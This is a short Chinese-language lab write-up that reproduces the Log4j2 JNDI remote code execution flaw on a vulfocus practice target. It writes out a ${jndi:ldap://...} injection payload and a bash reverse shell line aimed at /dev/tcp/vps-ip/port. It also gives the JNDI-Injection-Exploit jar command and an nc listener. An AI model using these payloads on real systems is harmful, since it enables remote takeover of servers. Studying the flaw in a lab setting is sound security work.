Log4j2远程命令执行复现

前言

一、Apache Log4j2漏洞描述

描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架，并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发，用来记录日志信息。 在大多数情况下，开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包，最终触发远程代码执行。。

二、复现环境

环境是http://vulfocus.fofa.so平台的

01.工具

下载：https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

02.漏洞验证过程

02.1 POST请求，构造payload=xxx

http://vulfocus.fofa.so:56688/hello
POST
payload=${jndi:ldap://o5grdz.dnslog.cn/}

02.2 dns解析平台
http://www.dnslog.cn/

03.反弹shell

base64加密shell反弹
使用：https://www.jackson-t.ca/runtime-exec-payloads.html
构造反弹shell命令：

bash -i >& /dev/tcp/vps-ip/port 0>&1

使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload
开启服务生成链接payload并开启nc监听，生成的链接每个都试一下。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反弹shell命令" -A vps-ip

VPS开启监听8080端口nc -lvp 8080

利用Burp发送payload

反弹成功

nc反弹成功

总结

如果反弹不成功请检查①vps防火墙端口是否开放，②构造命令时编码是否正确。